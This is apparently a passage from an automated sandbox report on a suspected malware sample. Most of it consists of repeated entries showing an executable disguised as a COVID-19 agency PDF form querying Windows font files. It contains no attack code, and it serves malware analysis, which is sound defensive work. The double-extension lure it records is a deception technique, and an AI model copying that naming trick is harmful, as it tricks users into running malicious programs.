                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
